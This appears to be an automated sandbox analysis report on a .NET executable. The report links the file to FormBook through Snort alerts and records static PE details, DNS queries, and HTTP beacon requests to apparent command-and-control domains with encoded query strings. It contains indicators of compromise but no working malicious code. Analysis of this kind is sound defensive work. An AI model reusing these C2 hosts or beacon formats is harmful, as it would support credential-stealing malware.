                        • www.vestamobile.com/c28n/?-Zl=BwxsM8rRu+R6ZjIadp4KdiQptkWWHTzqe5Z/ld4s21xj8K8eoUYG89NnPoNyzSQIYa401Q==&Rnjl=fpapUTW

                        Domains

                        No context

                        ASN

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        EGIHOSTINGUSor4ypx7EryGet hashmaliciousBrowse
                        • 172.120.223.197
                        Zr26f1rL6r.exeGet hashmaliciousBrowse
                        • 172.120.157.187
                        SOA.exeGet hashmaliciousBrowse
                        • 45.39.212.96
                        Swift Copy TT.docGet hashmaliciousBrowse
                        • 142.111.110.248
                        Product Offerety44663573.xlsxGet hashmaliciousBrowse
                        • 68.68.98.160
                        Env#U00edo diciembre.exeGet hashmaliciousBrowse
                        • 104.253.94.109
                        IAENMAI.xlsxGet hashmaliciousBrowse
                        • 23.27.137.70
                        jydygx.arm7Get hashmaliciousBrowse
                        • 107.165.18.79
                        202111161629639000582.exeGet hashmaliciousBrowse
                        • 166.88.19.181
                        w8aattzDPjGet hashmaliciousBrowse
                        • 172.121.95.168
                        XxMcevQr2ZGet hashmaliciousBrowse
                        • 172.120.108.136
                        sora.armGet hashmaliciousBrowse
                        • 136.0.238.242
                        x3mKjigp7jGet hashmaliciousBrowse
                        • 216.172.145.226
                        588885.xlsxGet hashmaliciousBrowse
                        • 107.187.86.150
                        New Order INQ211118.exeGet hashmaliciousBrowse
                        • 23.230.105.118
                        REltoQA3nv.exeGet hashmaliciousBrowse
                        • 107.164.102.213
                        uranium.x86Get hashmaliciousBrowse
                        • 136.0.81.164
                        SHIPPPING-DOC.xlsxGet hashmaliciousBrowse
                        • 50.118.200.122
                        order-2021-PO.Pdf.exeGet hashmaliciousBrowse
                        • 142.111.56.40
                        zhaP868fw5Get hashmaliciousBrowse
                        • 23.27.237.204
                        ROOTNETWORKSUSArrival Notice, CIA Awb Inv Form.pdf.exeGet hashmaliciousBrowse
                        • 154.94.229.8
                        eh.armGet hashmaliciousBrowse
                        • 154.82.151.141
                        l1z4rdsQu4D.x86Get hashmaliciousBrowse
                        • 154.27.158.217
                        d8Hs7X8HGPGet hashmaliciousBrowse
                        • 154.27.246.223
                        y2NMF6ulOIGet hashmaliciousBrowse
                        • 154.82.103.232
                        Hilix.armGet hashmaliciousBrowse
                        • 154.82.151.120
                        document.exeGet hashmaliciousBrowse
                        • 154.82.127.19
                        yXTRZQmYdrGet hashmaliciousBrowse
                        • 154.94.148.183
                        Owari.arm7Get hashmaliciousBrowse
                        • 154.82.103.252
                        JuihXmkZGFGet hashmaliciousBrowse
                        • 154.94.148.170
                        2gRh8To5o9Get hashmaliciousBrowse
                        • 154.27.246.214
                        zFDNFIXYHnGet hashmaliciousBrowse
                        • 103.211.168.19
                        peach.armGet hashmaliciousBrowse
                        • 156.236.248.47
                        zgV2Uq4fmuGet hashmaliciousBrowse
                        • 156.236.225.9
                        7fic3HM8I3Get hashmaliciousBrowse
                        • 156.236.225.7
                        mixazed_20210816-155711.exeGet hashmaliciousBrowse
                        • 154.82.111.78
                        M8XFTAqveTGet hashmaliciousBrowse
                        • 154.82.151.133
                        RR8K3UpQdtGet hashmaliciousBrowse
                        • 38.240.210.8
                        Qka3fi8NpLGet hashmaliciousBrowse
                        • 154.82.151.169
                        Z7bNxhhS7yGet hashmaliciousBrowse
                        • 154.82.151.124

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\cK1g5gckZR9VHjj.exe.log
                        Process:C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):2239
                        Entropy (8bit):5.354287817410997
                        Encrypted:false
                        SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIW7HKjntHoxHhAHKzvr1qHXHK2HKgmHKovjHKs:iqXeqm00YqhQnouRqjntIxHeqzTw3q2W
                        MD5:913D1EEA179415C6D08FB255AE42B99D
                        SHA1:E994C612C0596994AAE55FBCE35B7A4FBE312FD7
                        SHA-256:473B4000084ACF4C7D701CE72EBF71BD304054231B3BDF7CAF49898A1FDA13D0
                        SHA-512:768045C288CEEE8FE1A099FC8CEA713B685F6ED3FD8BFA1C8E64CA09F7AF9FEBEA90F5277B28444AFF8F2AC7CD857DFCDF7D3A98CD86288925DB7A4A42346185
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):7.842673281078141
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        • Win32 Executable (generic) a (10002005/4) 49.78%
                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        • DOS Executable Generic (2002/1) 0.01%
                        File name:cK1g5gckZR9VHjj.exe
                        File size:445440
                        MD5:5f19b9a3e41ef2e6ec3200bf4a246cec
                        SHA1:25638b49edf7444005e1e02fb5d972da5920e1d8
                        SHA256:afac806262706aea36f8c34cb56ffa94f49da9b39b752cfd077f9b921e972c1d
                        SHA512:9819afc87fe9dc827cfdaf7a676ab8e01f7e419ac09e354cbb3270e167527db2ffea6d61fbe46469c14e3a8a2689f26c98712606e0878294167ed7e15e6fb2c5
                        SSDEEP:12288:G/NdU0VixBFmkJ+W/wCCGBRG5F2ZBGutgq:G/vU0Vi1nJ+dCPukAuJ
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...hI.a..............0.................. ........@.. .......................@............@................................

                        File Icon

                        Icon Hash:00828e8e8686b000

                        Static PE Info

                        General

                        Entrypoint:0x46e0b6
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Time Stamp:0x619F4968 [Thu Nov 25 08:29:28 2021 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:v4.0.30319
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                        Entrypoint Preview

                        Instruction
                        jmp dword ptr [00402000h]
                        add byte ptr [eax], al
                        add byte ptr [ebp+0800000Eh], ch
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x6e0640x4f.text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x700000x5c4.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000xc.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x20000x6c0cc0x6c200False0.883977601156data7.85526570093IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .rsrc0x700000x5c40x600False0.4296875data4.13349213194IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0x720000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountry
                        RT_VERSION0x700900x334data
                        RT_MANIFEST0x703d40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                        Imports

                        DLLImport
                        mscoree.dll_CorExeMain

                        Version Infos

                        DescriptionData
                        Translation0x0000 0x04b0
                        LegalCopyrightCopyright Rogers Peet
                        Assembly Version8.0.6.0
                        InternalNameIVectorVi.exe
                        FileVersion5.6.0.0
                        CompanyNameRogers Peet
                        LegalTrademarks
                        Comments
                        ProductNameBiblan
                        ProductVersion5.6.0.0
                        FileDescriptionBiblan
                        OriginalFilenameIVectorVi.exe

                        Network Behavior

                        Snort IDS Alerts

                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                        11/25/21-15:11:39.736402ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.68.8.8.8
                        11/25/21-15:11:41.436557TCP2031453ET TROJAN FormBook CnC Checkin (GET)4980180192.168.2.63.64.163.50
                        11/25/21-15:11:41.436557TCP2031449ET TROJAN FormBook CnC Checkin (GET)4980180192.168.2.63.64.163.50
                        11/25/21-15:11:41.436557TCP2031412ET TROJAN FormBook CnC Checkin (GET)4980180192.168.2.63.64.163.50

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Nov 25, 2021 15:11:35.934700012 CET4977980192.168.2.6154.94.210.101
                        Nov 25, 2021 15:11:36.124350071 CET8049779154.94.210.101192.168.2.6
                        Nov 25, 2021 15:11:36.124520063 CET4977980192.168.2.6154.94.210.101
                        Nov 25, 2021 15:11:36.125092030 CET4977980192.168.2.6154.94.210.101
                        Nov 25, 2021 15:11:36.336148024 CET8049779154.94.210.101192.168.2.6
                        Nov 25, 2021 15:11:36.336168051 CET8049779154.94.210.101192.168.2.6
                        Nov 25, 2021 15:11:36.336180925 CET8049779154.94.210.101192.168.2.6
                        Nov 25, 2021 15:11:36.336196899 CET8049779154.94.210.101192.168.2.6
                        Nov 25, 2021 15:11:36.336213112 CET8049779154.94.210.101192.168.2.6
                        Nov 25, 2021 15:11:36.336227894 CET8049779154.94.210.101192.168.2.6
                        Nov 25, 2021 15:11:36.336288929 CET4977980192.168.2.6154.94.210.101
                        Nov 25, 2021 15:11:36.336435080 CET4977980192.168.2.6154.94.210.101
                        Nov 25, 2021 15:11:36.336544037 CET4977980192.168.2.6154.94.210.101
                        Nov 25, 2021 15:11:36.526585102 CET8049779154.94.210.101192.168.2.6
                        Nov 25, 2021 15:11:41.411189079 CET4980180192.168.2.63.64.163.50
                        Nov 25, 2021 15:11:41.434387922 CET80498013.64.163.50192.168.2.6
                        Nov 25, 2021 15:11:41.436362982 CET4980180192.168.2.63.64.163.50
                        Nov 25, 2021 15:11:41.436557055 CET4980180192.168.2.63.64.163.50
                        Nov 25, 2021 15:11:41.456016064 CET80498013.64.163.50192.168.2.6
                        Nov 25, 2021 15:11:41.456082106 CET80498013.64.163.50192.168.2.6
                        Nov 25, 2021 15:11:41.456110954 CET80498013.64.163.50192.168.2.6
                        Nov 25, 2021 15:11:41.456293106 CET4980180192.168.2.63.64.163.50
                        Nov 25, 2021 15:11:41.456537008 CET4980180192.168.2.63.64.163.50
                        Nov 25, 2021 15:11:41.475897074 CET80498013.64.163.50192.168.2.6
                        Nov 25, 2021 15:11:46.683671951 CET4982180192.168.2.6142.252.22.166
                        Nov 25, 2021 15:11:46.852204084 CET8049821142.252.22.166192.168.2.6
                        Nov 25, 2021 15:11:46.852335930 CET4982180192.168.2.6142.252.22.166
                        Nov 25, 2021 15:11:46.852530956 CET4982180192.168.2.6142.252.22.166
                        Nov 25, 2021 15:11:47.031126976 CET8049821142.252.22.166192.168.2.6
                        Nov 25, 2021 15:11:47.031146049 CET8049821142.252.22.166192.168.2.6
                        Nov 25, 2021 15:11:47.031155109 CET8049821142.252.22.166192.168.2.6
                        Nov 25, 2021 15:11:47.031323910 CET4982180192.168.2.6142.252.22.166
                        Nov 25, 2021 15:11:47.031456947 CET4982180192.168.2.6142.252.22.166
                        Nov 25, 2021 15:11:47.201138973 CET8049821142.252.22.166192.168.2.6
                        Nov 25, 2021 15:12:02.310941935 CET4982580192.168.2.6209.17.116.163
                        Nov 25, 2021 15:12:05.311918974 CET4982580192.168.2.6209.17.116.163
                        Nov 25, 2021 15:12:11.312515974 CET4982580192.168.2.6209.17.116.163
                        Nov 25, 2021 15:12:23.998922110 CET4984980192.168.2.6209.17.116.163

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Nov 25, 2021 15:11:34.718662977 CET5378153192.168.2.68.8.8.8
                        Nov 25, 2021 15:11:35.732012987 CET5378153192.168.2.68.8.8.8
                        Nov 25, 2021 15:11:35.928148031 CET53537818.8.8.8192.168.2.6
                        Nov 25, 2021 15:11:39.736213923 CET53537818.8.8.8192.168.2.6
                        Nov 25, 2021 15:11:41.348179102 CET5498253192.168.2.68.8.8.8
                        Nov 25, 2021 15:11:41.409744024 CET53549828.8.8.8192.168.2.6
                        Nov 25, 2021 15:11:46.591064930 CET6371853192.168.2.68.8.8.8
                        Nov 25, 2021 15:11:46.682406902 CET53637188.8.8.8192.168.2.6
                        Nov 25, 2021 15:11:57.075520992 CET6211653192.168.2.68.8.8.8
                        Nov 25, 2021 15:11:57.112966061 CET53621168.8.8.8192.168.2.6
                        Nov 25, 2021 15:12:02.135910988 CET6381653192.168.2.68.8.8.8
                        Nov 25, 2021 15:12:02.309823036 CET53638168.8.8.8192.168.2.6
                        Nov 25, 2021 15:12:23.801845074 CET6220853192.168.2.68.8.8.8
                        Nov 25, 2021 15:12:23.989738941 CET53622088.8.8.8192.168.2.6

                        ICMP Packets

                        TimestampSource IPDest IPChecksumCodeType
                        Nov 25, 2021 15:11:39.736402035 CET192.168.2.68.8.8.8cff3(Port unreachable)Destination Unreachable

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                        Nov 25, 2021 15:11:34.718662977 CET192.168.2.68.8.8.80xa06cStandard query (0)www.qzttb.netA (IP address)IN (0x0001)
                        Nov 25, 2021 15:11:35.732012987 CET192.168.2.68.8.8.80xa06cStandard query (0)www.qzttb.netA (IP address)IN (0x0001)
                        Nov 25, 2021 15:11:41.348179102 CET192.168.2.68.8.8.80xe11fStandard query (0)www.royaldears.comA (IP address)IN (0x0001)
                        Nov 25, 2021 15:11:46.591064930 CET192.168.2.68.8.8.80x209cStandard query (0)www.dragonmodz.netA (IP address)IN (0x0001)
                        Nov 25, 2021 15:11:57.075520992 CET192.168.2.68.8.8.80x35bbStandard query (0)www.blueprintroslyn.comA (IP address)IN (0x0001)
                        Nov 25, 2021 15:12:02.135910988 CET192.168.2.68.8.8.80x140Standard query (0)www.pittsburghdata.centerA (IP address)IN (0x0001)
                        Nov 25, 2021 15:12:23.801845074 CET192.168.2.68.8.8.80xe244Standard query (0)www.pittsburghdata.centerA (IP address)IN (0x0001)

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                        Nov 25, 2021 15:11:35.928148031 CET8.8.8.8192.168.2.60xa06cNo error (0)www.qzttb.net154.94.210.101A (IP address)IN (0x0001)
                        Nov 25, 2021 15:11:39.736213923 CET8.8.8.8192.168.2.60xa06cServer failure (2)www.qzttb.netnonenoneA (IP address)IN (0x0001)
                        Nov 25, 2021 15:11:41.409744024 CET8.8.8.8192.168.2.60xe11fNo error (0)www.royaldears.com3.64.163.50A (IP address)IN (0x0001)
                        Nov 25, 2021 15:11:46.682406902 CET8.8.8.8192.168.2.60x209cNo error (0)www.dragonmodz.net142.252.22.166A (IP address)IN (0x0001)
                        Nov 25, 2021 15:11:57.112966061 CET8.8.8.8192.168.2.60x35bbName error (3)www.blueprintroslyn.comnonenoneA (IP address)IN (0x0001)
                        Nov 25, 2021 15:12:02.309823036 CET8.8.8.8192.168.2.60x140No error (0)www.pittsburghdata.center209.17.116.163A (IP address)IN (0x0001)
                        Nov 25, 2021 15:12:23.989738941 CET8.8.8.8192.168.2.60xe244No error (0)www.pittsburghdata.center209.17.116.163A (IP address)IN (0x0001)

                        HTTP Request Dependency Graph

                        • www.qzttb.net
                        • www.royaldears.com
                        • www.dragonmodz.net

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.649779154.94.210.10180C:\Windows\explorer.exe
                        TimestampkBytes transferredDirectionData
                        Nov 25, 2021 15:11:36.125092030 CET11598OUTGET /udeh/?Ipp=0GJ3uF0xqxUvxNgo0ZAG0/AKZrovZvEja3W0Pwl2ZRVpe8mYbBKREVo+7yTMDi1lrzUfYpfKkw==&w8e=oTrd HTTP/1.1
                        Host: www.qzttb.net
                        Connection: close
                        Data Raw: 00 00 00 00 00 00 00
                        Data Ascii:
                        Nov 25, 2021 15:11:36.336148024 CET12007INHTTP/1.1 404 Not Found
                        Content-Type: text/html; charset=utf-8
                        Server: Microsoft-IIS/10.0
                        X-Powered-By: PHP/7.0.33
                        X-Powered-By: ASP.NET
                        Date: Thu, 25 Nov 2021 14:11:35 GMT
                        Connection: close
                        Content-Length: 7447
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 79 73 74 65 6d 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 34 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 31 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 32 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 33 2e 73 75 62 68 65 61 64 69 6e 67 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 33 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 32 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0d 0a 20
                        Data Ascii: <!DOCTYPE html><html><head> <meta charset="UTF-8"> <title>System Error</title> <meta name="robots" content="noindex,nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"> <style> /* Base */ body { color: #333; font: 14px Verdana, "Helvetica Neue", helvetica, Arial, 'Microsoft YaHei', sans-serif; margin: 0; padding: 0 20px 20px; word-break: break-word; } h1{ margin: 10px 0 0; font-size: 28px; font-weight: 500; line-height: 32px; } h2{ color: #4288ce; font-weight: 400; padding: 6px 0; margin: 6px 0 0; font-size: 18px; border-bottom: 1px solid #eee; } h3.subheading { color: #4288ce; margin: 6px 0 0; font-weight: 400; } h3{ margin: 12px; font-size: 16px; font-weight: bold;
                        Nov 25, 2021 15:11:36.336168051 CET12008INData Raw: 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 61 62 62 72 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 75 72 73 6f 72 3a 20 68 65 6c 70 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75
                        Data Ascii: } abbr{ cursor: help; text-decoration: underline; text-decoration-style: dotted; } a{ color: #868686; cursor: pointer; } a:hov
                        Nov 25, 2021 15:11:36.336180925 CET12009INData Raw: 45 78 63 65 70 74 69 6f 6e 20 49 6e 66 6f 20 2a 2f 0d 0a 20 20 20 20 20 20 20 20 2e 65 78 63 65 70 74 69 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d
                        Data Ascii: Exception Info */ .exception { margin-top: 20px; } .exception .message{ padding: 12px; border: 1px solid #ddd; border-bottom: 0 none; line-height: 18px
                        Nov 25, 2021 15:11:36.336196899 CET12011INData Raw: 6f 64 65 20 70 72 65 20 6c 69 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 6c 65 66 74 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 64 64 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0d 0a
                        Data Ascii: ode pre li{ border-left: 1px solid #ddd; height: 18px; line-height: 18px; } .exception .source-code pre code{ color: #333; height: 100%; display: i
                        Nov 25, 2021 15:11:36.336213112 CET12012INData Raw: 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 65 78 63 65 70 74 69
                        Data Ascii: font-weight: bold; padding: 6px 0; } .exception-var table caption small{ font-weight: 300; display: inline-block; margin-left: 10px; color: #ccc;
                        Nov 25, 2021 15:11:36.336227894 CET12013INData Raw: 20 20 20 20 20 20 70 72 65 2e 70 72 65 74 74 79 70 72 69 6e 74 20 2e 6c 69 74 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 36 36 20 7d 20 20 2f 2a 20 61 20 6c 69 74 65 72 61 6c 20 76 61 6c 75 65 20 2a 2f 0d 0a 20 20 20 20 20 20 20 20 2f 2a 20 70 75 6e 63
